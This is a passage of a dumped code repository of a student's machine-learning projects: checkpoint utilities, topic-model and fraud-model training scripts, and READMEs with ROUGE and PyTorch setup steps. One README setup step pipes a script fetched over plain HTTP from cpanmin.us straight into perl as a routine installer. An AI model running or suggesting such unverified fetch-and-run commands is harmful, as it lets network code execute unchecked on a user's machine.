os.environ[\"PYTHONHASHSEED\"] = str(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n\ndef get_save_dir(base_dir, name, training, id_max = 20):\n for uid in range(1, id_max):\n subdir = 'train' if training else 'test'\n save_dir = os.path.join(base_dir, subdir, f\"{name}-{uid:02d}\")\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n return save_dir\n \n raise RuntimeError(\"Too many save directories with the same name. \\\n Delete one old directory or use a new name.\")\n\ndef get_devices(gpu_ids=[0]):\n if torch.cuda.is_available():\n device = torch.device(f\"cuda:{gpu_ids[0]}\")\n torch.cuda.set_device(device)\n else:\n device = torch.device(\"cpu\")\n return device\n\n\n\nclass CheckpointSaver():\n def __init__(self, save_dir, max_chckpoints=10, log=None):\n self.save_dir = save_dir\n self.max_chckpoints = max_chckpoints\n self.log = log\n self.best_val = None\n self.ckpt_paths = queue.PriorityQueue()\n self._print(f\"Initialize a saver which tracks loss minimization.\")\n\n def is_best(self, metric_val):\n if metric_val is None:\n return False\n if self.best_val is None:\n return True\n return (metric_val < self.best_val)\n\n def _print(self, message):\n if self.log is not None:\n self.log.info(message)\n \n def save(self, step, model, metric_val, device):\n \"\"\"\n Save model parameters and keep track of the best one.\n\n Parameters:\n -----------\n step: total number of examples we have seen so far\n \"\"\"\n ckpt_dict = {'model_name': model.__class__.__name__, \n 'model_state': model.cpu().state_dict(), \n 'step': step, }\n model.to(device)\n\n ckpt_path = os.path.join(self.save_dir, f'step_{step}.pth.tar')\n torch.save(ckpt_dict, ckpt_path)\n self._print(f\"Saved checkpoint: {ckpt_path}.\")\n\n if self.is_best(metric_val):\n self.best_val = metric_val\n best_path = os.path.join(self.save_dir, f\"best.pth.tar\")\n shutil.copy(ckpt_path, best_path)\n self._print(f\"New best checkpoint at step {step}.\")\n \n # add checkpoints to the priority queue. we use loss, so the order is -metric_val\n self.ckpt_paths.put((-metric_val, ckpt_path))\n\n # remove worst chekcpoints\n if self.ckpt_paths.qsize() > self.max_chckpoints:\n _, worst_ckpt = self.ckpt_paths.get()\n try:\n os.remove(worst_ckpt)\n self._print(f\"Removed checkpoint: {worst_ckpt}.\")\n except OSError:\n pass\n\n\ndef load_model(model, ckpt_path, gpu_ids, return_step = True):\n device = f\"cuda:{gpu_ids[0]}\" if torch.cuda.is_available() else \"cpu\"\n ckpt_dict = torch.load(ckpt_path, map_location = device)\n model.load_state_dict(ckpt_dict[\"model_state\"])\n \n if return_step:\n step = ckpt_dict[\"step\"]\n return model, step\n \n return model\n\n\ndef init_model(cfg):\n if cfg[\"name\"] == \"effnetb4\":\n return LyftEffnet(cfg)\n if cfg[\"name\"] == \"densenet161\":\n return LyftDensenet(cfg)\n if cfg[\"name\"] == \"effnetb7\":\n return LyftEffnetb7(cfg)\n raise f\"Only supports effnetb4, effnetb7 and densenet161\"\n\n\ndef forward(data, model, device, criterion = pytorch_neg_multi_log_likelihood_batch):\n inputs = data[\"image\"].to(device)\n target_availabilities = data[\"target_availabilities\"].to(device)\n targets = data[\"target_positions\"].to(device)\n batch_size = inputs.size(0)\n # Forward pass\n preds, confidences = model(inputs)\n loss = criterion(targets, preds, confidences, target_availabilities, device=device)\n return loss, preds, confidences, batch_size" }, { "alpha_fraction": 0.6420788168907166, "alphanum_fraction": 0.7444816827774048, "avg_line_length": 41.85029983520508, "blob_id": "1261e48632e025c637a0c40f2ad9b73f42bf0bc5", "content_id": "e4d6e0e0b4093d40b430056d4078f44ce7d10497", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7158, "license_type": "permissive", "max_line_length": 354, "num_lines": 167, "path": "/rbm_summarizer/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\nThis is the code for my STAT 8056 course project. The model is built on top of the [Pointer-Generator model](https://arxiv.org/abs/1704.04368) and the implementation for the PGNet model is adapted from the code in [atulkum/pointer_summarizer](https://github.com/atulkum/pointer_summarizer).\n\n- [Experiment Results](#experiment-results)\n - [Train the original pointer-generator model (with coverage loss disabled)](#train-the-original-pointer-generator-model-with-coverage-loss-disabled)\n - [Train the proposed model (PGNet + Text RBM)](#train-the-proposed-model-pgnet--text-rbm)\n- [Environment Configurations](#environment-configurations)\n- [Training Details](#training-details)\n - [Data Loading and Preprocessing](#data-loading-and-preprocessing)\n - [Model Training](#model-training)\n\n\n## Experiment Results\n### Train the original pointer-generator model (with coverage loss disabled)\nAfter training for 100k iterations (batch size 8)\n\n```\nROUGE-1:\nrouge_1_f_score: 0.3698 with confidence interval (0.3674, 0.3721)\nrouge_1_recall: 0.3907 with confidence interval (0.3880, 0.3933)\nrouge_1_precision: 0.3758 with confidence interval (0.3730, 0.3786)\n\nROUGE-2:\nrouge_2_f_score: 0.1593 with confidence interval (0.1572, 0.1615)\nrouge_2_recall: 0.1675 with confidence interval (0.1652, 0.1699)\nrouge_2_precision: 0.1631 with confidence interval (0.1607, 0.1655)\n\nROUGE-l:\nrouge_l_f_score: 0.3355 with confidence interval (0.3332, 0.3377)\nrouge_l_recall: 0.3541 with confidence interval (0.3517, 0.3567)\nrouge_l_precision: 0.3412 with confidence interval (0.3386, 0.3439)\n```\n\nAfter training for 500k iterations (batch size 8)\n\n```\nROUGE-1:\nrouge_1_f_score: 0.3592 with confidence interval (0.3570, 0.3616)\nrouge_1_recall: 0.3607 with confidence interval (0.3584, 0.3634)\nrouge_1_precision: 0.3812 with confidence interval (0.3785, 0.3841)\n\nROUGE-2:\nrouge_2_f_score: 0.1551 with confidence interval (0.1531, 0.1573)\nrouge_2_recall: 0.1552 with confidence interval (0.1530, 0.1575)\nrouge_2_precision: 0.1658 with confidence interval (0.1633, 0.1682)\n\nROUGE-l:\nrouge_l_f_score: 0.3287 with confidence interval (0.3265, 0.3311)\nrouge_l_recall: 0.3299 with confidence interval (0.3276, 0.3325)\nrouge_l_precision: 0.3492 with confidence interval (0.3465, 0.3519)\n```\n\n![Alt text](learning_curve_pg.png?raw=true \"Learning Curve with original pgnet\")\n\n### Train the proposed model (PGNet + Text RBM)\nAfter training for 100k iterations (batch size 8)\n\n```\nROUGE-1:\nrouge_1_f_score: 0.3633 with confidence interval (0.3610, 0.3656)\nrouge_1_recall: 0.3843 with confidence interval (0.3818, 0.3869)\nrouge_1_precision: 0.3690 with confidence interval (0.3660, 0.3717)\n\nROUGE-2:\nrouge_2_f_score: 0.1562 with confidence interval (0.1541, 0.1584)\nrouge_2_recall: 0.1648 with confidence interval (0.1625, 0.1671)\nrouge_2_precision: 0.1596 with confidence interval (0.1572, 0.1621)\n\nROUGE-l:\nrouge_l_f_score: 0.3305 with confidence interval (0.3282, 0.3328)\nrouge_l_recall: 0.3494 with confidence interval (0.3469, 0.3519)\nrouge_l_precision: 0.3359 with confidence interval (0.3332, 0.3386)\n```\n\nAfter training for 500k iterations (batch size 8)\n\n```\nROUGE-1:\nrouge_1_f_score: 0.3633 with confidence interval (0.3608, 0.3657)\nrouge_1_recall: 0.3631 with confidence interval (0.3604, 0.3656)\nrouge_1_precision: 0.3880 with confidence interval (0.3851, 0.3909)\n\nROUGE-2:\nrouge_2_f_score: 0.1583 with confidence interval (0.1560, 0.1607)\nrouge_2_recall: 0.1574 with confidence interval (0.1550, 0.1599)\nrouge_2_precision: 0.1705 with confidence interval (0.1679, 0.1733)\n\nROUGE-l:\nrouge_l_f_score: 0.3325 with confidence interval (0.3300, 0.3348)\nrouge_l_recall: 0.3321 with confidence interval (0.3294, 0.3347)\nrouge_l_precision: 0.3554 with confidence interval (0.3525, 0.3582)\n```\n![Alt text](learning_curve_rbmpg.png?raw=true \"Learning Curve with rbmpg\")\n\n\n## Environment Configurations\n1. Set up the virtual environment.\n ```bash\n conda env create -f environment.yml\n ```\n1. The implementation in [atulkum/pointer_summarizer](https://github.com/atulkum/pointer_summarizer) uses pytorch 0.4 and python 2.7, for the sake of convenience, we use the same version. Since torch 0.4 is not supported on CUDA 10.0, so we resort to CUDA 9.2. Since Tensorflow-gpu is only compatible with 9, not 9.2, so install tensorflow with cpu only.\n2. Install tensorflow\n\t```bash\n\tpip install --upgrade tensorflow==1.15.0\n\t```\n4. Install pytorch 0.4 to be compatible with the code.\n\t```bash\n\tconda search cudatoolkit\n\tconda search cudnn\n\tconda install cudatoolkit=9.2\n\tconda install cudnn=7.6.0=cuda9.2_0\n\tmodule load cuda/9.2.148\n\tconda install pytorch=0.4.1 cuda92 -c pytorch\n\t```\n4. pip install the **nltk** package.\n\t```bash\n\tpip install nltk==3.4.5\n\t```\n5. Install **pyrouge** and **ROUGE** without root.\n\n\tReference: \n - [stackoverflow: installing pyrouge and ROUGE in ubuntu](https://stackoverflow.com/a/57686103/13448382)\n\t- [stackoverflow: use CPAN as a non-root user](https://stackoverflow.com/questions/2980297/how-can-i-use-cpan-as-a-non-root-user)\n\t- [github issues: install XML::Parser](https://github.com/pltrdy/files2rouge/issues/9#issuecomment-593850124)\n\t```bash\n\t# step 1: install pyrouge from source\n\tgit clone https://github.com/bheinzerling/pyrouge\n\tcd pyrouge\n\tpip install -e .\n\t# step 2: install official ROUGE script\n\tgit clone https://github.com/andersjo/pyrouge.git rouge\n\t# step 3: point pyrouge to official rouge script\n\tpyrouge_set_rouge_path ~/pyrouge/rouge/tools/ROUGE-1.5.5/\n\t# step 4: install xml parser\n\twget -O- http://cpanmin.us | perl - -l ~/perl5 App::cpanminus local::lib\n\teval `perl -I ~/perl5/lib/perl5 -Mlocal::lib`\n\techo 'eval `perl -I ~/perl5/lib/perl5 -Mlocal::lib`' >> ~/.bash_profile\n\techo 'export MANPATH=$HOME/perl5/man:$MANPATH' >> ~/.bash_profile\n\t# step 5: regenerate the Exceptions DB\n\tcd rouge/tools/ROUGE-1.5.5/data\n\trm WordNet-2.0.exc.db\n\t./WordNet-2.0-Exceptions/buildExeptionDB.pl ./WordNet-2.0-Exceptions ./smart_common_words.txt ./WordNet-2.0.exc.db\n\t# step 6: run the tests\n\tpython -m pyrouge.test\n\t```\n\t\n\n## Training Details\n\n### Data Loading and Preprocessing\n1. Follow data generation instruction from https://github.com/abisee/cnn-dailymail.\n 1. We need to use [corenlp-3.7.0](https://stanfordnlp.github.io/CoreNLP/history.html) for the script to work.\n 2. We need to load java `module load jdk/9.0.1` in the dags server.\n2. Run `python train_textRBM/get_top15k` to generate a text file containing the 15k most frequent words in the training dataset.\n\n### Model Training\n1. Change the paths and parameters in `data_util/config.py`.\n2. Run `bash start_rbm.sh` to train the Replicated Softmax model.\n3. Run `bash start_train.sh` to train the Pointer-Generator model.\n4. Run `bash start_decode.sh` to decode.\n5. Run `bash start_eval.sh` to evaluate using ROUGE.\n\nNote:\n\n* In decode mode beam search batch should have only one example replicated to batch size\nhttps://github.com/atulkum/pointer_summarizer/blob/master/training_ptr_gen/decode.py#L109\nhttps://github.com/atulkum/pointer_summarizer/blob/master/data_util/batcher.py#L226\n* All the log files have been removed from the repository due to privacy concern.\n\n" }, { "alpha_fraction": 0.7419354915618896, "alphanum_fraction": 0.7419354915618896, "avg_line_length": 30, "blob_id": "d4b8342141e5915272c42f939e1c7608bd9f4c80", "content_id": "d0412ce78f56998cb924d175d3905c80f7a4854b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 31, "license_type": "no_license", "max_line_length": 30, "num_lines": 1, "path": "/textual_causality/ate/run_ate.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "R CMD BATCH ate.R run_ate.Rout\n" }, { "alpha_fraction": 0.7034700512886047, "alphanum_fraction": 0.7570977807044983, "avg_line_length": 65.78947448730469, "blob_id": "92451c0a4e4ee41187b3bfc3e5b8ee525d217163", "content_id": "e76348bca4cd35b4c66b885e4b096aef3a0c4fe2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1268, "license_type": "no_license", "max_line_length": 132, "num_lines": 19, "path": "/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# Projects\n\nThis repository contains projects that I have finished so far.\n1. *__Kaggle Travelers__*: 2018 Fall, the final project of STAT 8051.\n - Focuses on classifying insurace fraud.\n2. *__Learning_Rate__*: 2019 Fall, the final project of IE 8521.\n - Focuses on investigating how different learning rate decaying schemes affect the convergence of the algorithm in deep learning.\n3. *__MinneMUDAC__*: 2019 Fall, MinneMUDAC 2019 Student Data Science Challenge.\n - Focuses on prediting soybean price in the commodity market.\n4. *__imbCalib__*: 2020 Spring, the final project of STAT 8054.\n - Focuses on probability calibration under the imbalanced data scenario.\n5. *__wellsfargo__*: 2020 Summer, Wells Fargo Campus Analytics Challenge 2020.\n - Focuses on developing a machine learning model for a binary classification task.\n6. *__lyft__*: 2020 Fall, Kaggle: Lyft Motion Prediction for Autonomous Vehicles\n - Focuses on motion prediction for self-driving vehicles.\n7. *__squad__*: 2020 Fall, the final project of STAT 8931.\n - Focuses on building a model for Machine Reading Comprehension tasks.\n8. *__rbm_summarizer__*: 2021 Spring, the final project of STAT 8056.\n - Focuses on building a summarization model with assistance from topic information." }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.764976978302002, "avg_line_length": 53.25, "blob_id": "d37340e645db5df939462b273aa2679b654366d0", "content_id": "afdcf330fae1ae10b1b974223f2ea57279cb7b9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 434, "license_type": "no_license", "max_line_length": 150, "num_lines": 8, "path": "/movielens/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# MovieLens Recommender System\n\nThis is an applied project that I have done in the course STAT8056.\n\n## Configurations\n1. Use `environment.yml` to create the conda virtual environment: `conda env create -f environment.yml`.\n2. Install PyTorch: `pip install torch==1.7.1+cu101 torchvision==0.8.2+cu101 torchaudio==0.7.2 -f https://download.pytorch.org/whl/torch_stable.html`.\n3. Install TensorFlow: `pip install --upgrade tensorflow`.\n" }, { "alpha_fraction": 0.5404453873634338, "alphanum_fraction": 0.5484392642974854, "avg_line_length": 43.341773986816406, "blob_id": "d84ff72e2cbeba3fcf0a8c27e432eab7f9aaf208", "content_id": "82855ee574845036f658b6e01d364ccdb6ae2b45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10508, "license_type": "no_license", "max_line_length": 114, "num_lines": 237, "path": "/textual_causality/etm-ps/run_etm.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"Train an ETM on CNNDM.\n\"\"\"\n\nimport numpy as np\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.optim.lr_scheduler as sched\nfrom torch.utils.data import DataLoader\nfrom transformers import RobertaTokenizer, RobertaModel\nfrom collections import OrderedDict\nfrom json import dumps\nfrom tensorboardX import SummaryWriter\nfrom tqdm import tqdm\nimport os\nfrom functools import partial\n\nimport util\nfrom args import get_train_args\nfrom data_utils import collate_mp, CNNDM\nfrom models import ETM\n\n\ndef main(args):\n # Set up logging and devices\n args.save_dir = util.get_save_dir(args.save_dir, args.name, training=True)\n log = util.get_logger(args.save_dir, args.name)\n tbx = SummaryWriter(args.save_dir)\n device = util.get_devices(args.gpu_ids)\n log.info(f'Args: {dumps(vars(args), indent=4, sort_keys=True)}')\n args.batch_size *= max(1, len(args.gpu_ids))\n\n # Set random seed\n log.info(f'Using random seed {args.seed}...')\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed_all(args.seed)\n\n # Get embeddings\n log.info('Loading embeddings...')\n tokenizer = RobertaTokenizer.from_pretrained(args.model_type, verbose = False)\n encoder = RobertaModel.from_pretrained(args.model_type)\n embeddings = encoder.embeddings.word_embeddings.weight # 50265 x 768\n embed_size = embeddings.size(1)\n vocab_size = tokenizer.vocab_size\n\n # Get model\n log.info('Building model...')\n model = ETM(args.num_topics, vocab_size, embed_size, args.vi_nn_hidden_size,\n args.theta_act, embeddings, args.enc_drop)\n log.info(f\"model: {model}\")\n\n model = nn.DataParallel(model, args.gpu_ids)\n if args.load_path:\n log.info(f'Loading checkpoint from {args.load_path}...')\n model, step = util.load_model(model, args.load_path, args.gpu_ids)\n else:\n step = 0\n model = model.to(device)\n model.train()\n ema = util.EMA(model, args.ema_decay)\n\n # Get saver\n saver = util.CheckpointSaver(args.save_dir,\n max_checkpoints=args.max_checkpoints,\n metric_name=args.metric_name,\n maximize_metric=args.maximize_metric,\n log=log)\n\n # Get optimizer and scheduler\n if args.optimizer == 'adam':\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.l2_wd) # l2 weight decay\n elif args.optimizer == 'adagrad':\n optimizer = optim.Adagrad(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'adadelta':\n optimizer = optim.Adadelta(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'rmsprop':\n optimizer = optim.RMSprop(model.parameters(), lr=args.lr, weight_decay=args.l2_wd)\n elif args.optimizer == 'asgd':\n optimizer = optim.ASGD(model.parameters(), lr=args.lr, t0=0, lambd=0., weight_decay=args.l2_wd)\n else:\n print('Defaulting to vanilla SGD')\n optimizer = optim.SGD(model.parameters(), lr=args.lr)\n\n scheduler = sched.LambdaLR(optimizer, lambda s: 0.999 ** s) # Constant LR\n\n # Get data loader\n log.info('Building dataset...')\n train_dataset = CNNDM(os.path.join(args.data_dir, \"train\"), args.model_type, is_test = False)\n train_collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n train_loader = DataLoader(train_dataset, \n batch_size=args.batch_size, \n shuffle=True, \n num_workers=args.num_workers, \n collate_fn=train_collate_fn)\n val_dataset = CNNDM(os.path.join(args.data_dir, \"val\"), args.model_type, is_test = True)\n val_collate_fn = partial(collate_mp, pad_token_id = tokenizer.pad_token_id, \n vocab_size = vocab_size, is_test = False)\n val_loader = DataLoader(val_dataset, \n batch_size=args.batch_size, \n shuffle=False, \n num_workers=args.num_workers, \n collate_fn=val_collate_fn)\n\n # Train\n log.info('Training...')\n steps_till_eval = args.eval_steps\n epoch = step // len(train_dataset)\n while epoch != args.num_epochs:\n epoch += 1\n log.info(f'Starting epoch {epoch}...')\n with torch.enable_grad(), \\\n tqdm(total=len(train_loader.dataset)) as progress_bar:\n for (i, batch) in enumerate(train_loader):\n # Setup for forward\n optimizer.zero_grad()\n model.zero_grad() # added for performance consideration\n \n bows = batch[\"src_bows\"].to(device) # (batch_size x vocab_size)\n batch_size = bows.size(0)\n sums = bows.sum(1).unsqueeze(1) # (batch_size x 1)\n if args.bow_norm:\n normalized_bows = bows / sums # (batch_size x vocab_size)\n else:\n normalized_bows = bows\n\n if torch.isnan(normalized_bows).any():\n log.info(f\"There are NaNs in bows at batch {i}\")\n\n # Forward\n _, _, kl_divergence, preds = model(normalized_bows=normalized_bows)\n recon_loss = -(preds * bows).sum(1).mean()\n kl_divergence = kl_divergence.mean()\n loss = recon_loss + kl_divergence\n loss_val = loss.item()\n \n # Backward\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n optimizer.step()\n scheduler.step()\n ema(model, step // batch_size)\n\n # Log info\n step += batch_size\n progress_bar.update(batch_size)\n progress_bar.set_postfix(epoch=epoch, \n recon_loss=recon_loss.item(), \n kl_div=kl_divergence.item(), \n NELBO=loss_val)\n tbx.add_scalar('train/recon_loss', recon_loss.item(), step)\n tbx.add_scalar('train/kl_div', kl_divergence.item(), step)\n tbx.add_scalar('train/NELBO', loss_val, step)\n tbx.add_scalar('train/LR', optimizer.param_groups[0]['lr'], step)\n\n steps_till_eval -= batch_size\n if steps_till_eval <= 0:\n steps_till_eval = args.eval_steps\n\n # Evaluate and save checkpoint\n log.info(f'Evaluating at step {step}...')\n ema.assign(model)\n results, pred_topics = evaluate(args, model, val_loader, tokenizer, device)\n saver.save(step, model, results[args.metric_name], device)\n ema.resume(model)\n\n # Log to console\n results_str = ', '.join(f'{k}: {v:05.2f}' for k, v in results.items())\n log.info(f'Val {results_str}')\n for k, topic_words in pred_topics.items():\n if k < 50:\n log.info(f\"Topic {k}: {topic_words}\")\n \n # Log to TensorBoard\n log.info('Visualizing in TensorBoard...')\n for k, v in results.items():\n tbx.add_scalar(f'val/{k}', v, step)\n util.visualize(tbx,\n pred_topics=pred_topics,\n step=step,\n split='val',\n vis_num_topics=args.vis_num_topics)\n\n\ndef evaluate(args, model, data_loader, tokenizer, device):\n ppl_meter = util.AverageMeter()\n model.eval()\n with torch.no_grad(), tqdm(total=len(data_loader.dataset)) as progress_bar:\n beta = model(beta_only=True)[:args.num_topics, :] # (K x vocab_size)\n top_10_indices = beta.argsort(dim = -1, descending=True)[:, :10] # (K x 10)\n frequency = torch.zeros(beta.size(0), 55).to(device) # (K x 55), occurrence and cooccurrence\n\n for batch in data_loader:\n bows = batch['src_bows'].to(device)\n batch_size = bows.size(0)\n half_batch_size = batch_size // 2\n bows_1 = bows[:half_batch_size, :]\n bows_2 = bows[half_batch_size: 2 * half_batch_size, :]\n \n # get theta from the first half of the documents\n sums_1 = bows_1.sum(1).unsqueeze(1)\n if args.bow_norm:\n normalized_bows_1 = bows_1 / sums_1 # (half_batch_size x vocab_size)\n else:\n normalized_bows_1 = bows_1\n _, _, _, preds = model(normalized_bows=normalized_bows_1)\n # get prediction on the second half of the documents\n recon_loss = -(preds * bows_2).sum(1) # (half_batch_size, )\n sums_2 = bows_2.sum(1)\n loss = recon_loss / sums_2 # (half_batch_size, )\n ppl_meter.update(loss.mean().item(), half_batch_size)\n\n # get word-doc occurrence frequency: used for topic coherence calculation\n occurrence = 1 * (torch.stack([bows[i, :][top_10_indices] \\\n for i in range(batch_size)]) != 0) # (batch_size x K x 10)\n cooccurence = torch.stack([torch.stack([util.get_outer_triu_values(occurrence[i, j, :]) \\\n for j in range(occurrence.size(1))]) for i in range(occurrence.size(0))]) # (batch_size x K x 55)\n frequency += cooccurence.sum(0) # (K x 55)\n\n # Log info\n progress_bar.update(batch_size)\n progress_bar.set_postfix(PPL=ppl_meter.avg)\n \n results_list = [('PPL', ppl_meter.avg), \n ('TC', util.get_topic_coherence(frequency.data.cpu().numpy(), \\\n len(data_loader.dataset))), \n ('TD', util.get_topic_diversity(beta, args.td_topnum))]\n results = OrderedDict(results_list)\n pred_topics = util.get_topics(beta, tokenizer, args.vis_num_words)\n model.train()\n return results, pred_topics\n\nif __name__ == '__main__':\n main(get_train_args())" }, { "alpha_fraction": 0.7512953281402588, "alphanum_fraction": 0.7595854997634888, "avg_line_length": 31.16666603088379, "blob_id": "9c8aa64b1c47adabfb18ed1c01d1c4313db191ab", "content_id": "b2f23345008862171c9a033a4aecb44f7b276e10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 965, "license_type": "no_license", "max_line_length": 92, "num_lines": 30, "path": "/wellsfargo/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# 2020 Wells Fargo Campus Analytics Challenge\n\nTeam Members: Xuesong Hou, Chunlin Li, Yu Yang\n\nChallenge Website: https://www.mindsumo.com/contests/campus-analytics-challenge-2020.\n\nThis repository contains all of the code, data, and images throughout our data anlaysis. \n\n### Data\n- `train.csv`, `test.csv`: converted from the original excel file provided by the challenge.\n- `pred.csv`: predictions given by our model.\n\n### Notebooks\n- `eda.ipynb`: exploratory data analysis.\n- `models.ipynb`: model comparison, encoding scheme investigation.\n- `group.ipynb`: fit sparse grouping pursuit models.\n- `models.py`: functions used in `models.ipynb`.\n- `group.py`: functions used in `group.ipynb`.\n\n## Environment Configuration\nCreate a conda environment using the following command in your shell.\n```bash\nconda env create -f environment.yml\n```\n\nActivate or deactivate the virtual environment using the following commands.\n```bash\nconda activate wellsfargo\nconda deactivate\n```\n" }, { "alpha_fraction": 0.6016896963119507, "alphanum_fraction": 0.6367195844650269, "avg_line_length": 36.921875, "blob_id": "3d43950a29037316e42943b2b8bb708fdb10504c", "content_id": "a9159721b3d25024f5c21cee63bfd4103e34a8e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4853, "license_type": "no_license", "max_line_length": 124, "num_lines": 128, "path": "/Kaggle_Travelers/notebooks/Model_comparison.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "##### Import packages #####\nimport numpy as np\nimport pandas as pd\nfrom xgboost import XGBClassifier\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier, \n GradientBoostingClassifier, VotingClassifier)\nfrom mlxtend.classifier import StackingCVClassifier\nfrom lightgbm import LGBMClassifier\nimport warnings\nwarnings.filterwarnings('ignore')\nfrom sklearn.metrics import roc_auc_score\n\nimport matplotlib.pyplot as plt; plt.rcdefaults()\nimport matplotlib.axes as ax\n\n\n##### Data Manipulation #####\n# read full training data set\ndf = pd.read_csv('data/train_data_clean_5_grouped.csv')\n\ngender_dummies = pd.get_dummies(df['gender'], \n prefix = 'gender', drop_first = True)\ndf = pd.concat([df, gender_dummies], axis = 1)\ndf.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df['living_status'], \n prefix = 'living_status', drop_first = True)\ndf = pd.concat([df, living_status_dummies], axis = 1)\ndf.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df['state'], \n prefix = 'state', drop_first = True)\ndf = pd.concat([df, state_dummies], axis = 1)\ndf.drop([\"state\"], axis = 1, inplace = True)\n\ndf = df.sample(frac=1, random_state=5)\ndf['new_param'] = df.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n\ndf.drop(['claim_number', 'claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf = df.filter(regex=\"^(?!state_).*$\")\ndf = df.filter(regex=\"^(?!vehicle_color_).*$\")\ndf = df.filter(regex=\"^(?!claim_day_).*$\")\ndf = df.filter(regex=\"^(?!claim_month_).*$\")\n\nX = df.drop(['fraud'], axis=1)\ny = df['fraud']\n\n\n##### Compare models #####\n# AdaBoost parameters\nada_params = {\n 'n_estimators': 116,\n 'learning_rate': 0.1554\n}\n\n# Random Forest parameters\nrf_params = {\n 'n_estimators': 235,\n 'max_depth': 84,\n 'min_samples_leaf': 34,\n 'max_features': 'sqrt'\n}\n\n# Logistic Regression parameters\nlr_params = {\n 'penalty': 'l1'\n}\n\n# XGBoost parameters\nxgb_params = {\n \"max_depth\": 3, \"learning_rate\": 0.06, \"n_estimators\": 180, \"silent\": True, \"objective\": 'binary:logistic',\n \"gamma\": 0.35, \"min_child_weight\": 5, \"max_delta_step\": 0, \"subsample\": 0.8, \"colsample_bytree\": 0.785,\n \"colsample_bylevel\": 1, \"reg_alpha\": 0.01, \"reg_lambda\": 1, \"scale_pos_weight\": 1, \"seed\": 1440, \"missing\": None\n}\n\n# LightGBM parameters\nlgmb_params = {\n 'boosting_type':'gbdt', 'objective':'binary', 'num_boost_round':800,\n 'feature_fraction': .321, 'bagging_fraction':0.50, 'min_child_samples':100, \n 'min_child_weigh':35, 'max_depth':3, 'num_leaves':2, 'learing_rate':0.15,\n 'reg_alpha':5, 'reg_lambda': 1.1, 'metric':'auc', 'max_bin': 52,\n 'colsample_bytree': 0.9, 'subsample': 0.8, 'is_unbalance': 'true'\n}\n\nada = AdaBoostClassifier(**ada_params)\nrf = RandomForestClassifier(**rf_params)\nlr = LogisticRegression(**lr_params)\nxgb = XGBClassifier(**xgb_params)\nlgbm = LGBMClassifier(**lgmb_params)\nxgb_lgbm = VotingClassifier(estimators=list(zip(['xgb', 'lgbm'], [xgb, lgbm])), \n voting='soft', weights=[6, 4])\nmodels = [ada, rf, lr, xgb, lgbm, xgb_lgbm]\nlong_labels = ['Adaboost', 'Random Forest', 'Logistic Regression', 'XGBoost', 'LightGBM', 'XGBoost_LightGBM']\nprint('5-fold cross validation:\\n')\nfor clf, label in zip(models, long_labels):\n scores = model_selection.cross_val_score(clf, X.values, y.values, cv = 5, scoring = 'roc_auc')\n print(\"AUC: %0.9f (+/- %0.4f) [%s]\" % (scores.mean(), scores.std(), label))\n\n\n##### Performance Visualization #####\nobjects = ('Adaboost', 'Random Forest', 'Logistic Regression',\n 'XGBoost', 'LightGBM', 'XGBoost_LightGBM')\ny_pos = np.arange(len(objects))\nperformance = (0.719963411, 0.711689776, 0.709100835, 0.725387261,\n 0.729196909, 0.730128054)\n\nplt.figure(figsize=(8, 6))\nplt.ylim(0.70, 0.74)\nrects = plt.bar(y_pos, performance, align='center', alpha=0.5)\nplt.xticks(y_pos, objects)\nplt.xticks(rotation=30)\nplt.ylabel('AUC')\nplt.title('Model Performance')\n\n\ndef autolabel(rects):\n for rect, perf in zip(rects, performance):\n height = rect.get_height()\n plt.text(rect.get_x() - rect.get_width()/6, 1.001*perf, '%s' % float(perf))\nautolabel(rects)\n\nplt.show()" }, { "alpha_fraction": 0.7544247508049011, "alphanum_fraction": 0.7765486836433411, "avg_line_length": 49.33333206176758, "blob_id": "f3979fb466d1846af78b3db008b473ee247134a6", "content_id": "742252ae938ea7c0d964f5dece36e27e2a14ee29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 452, "license_type": "no_license", "max_line_length": 247, 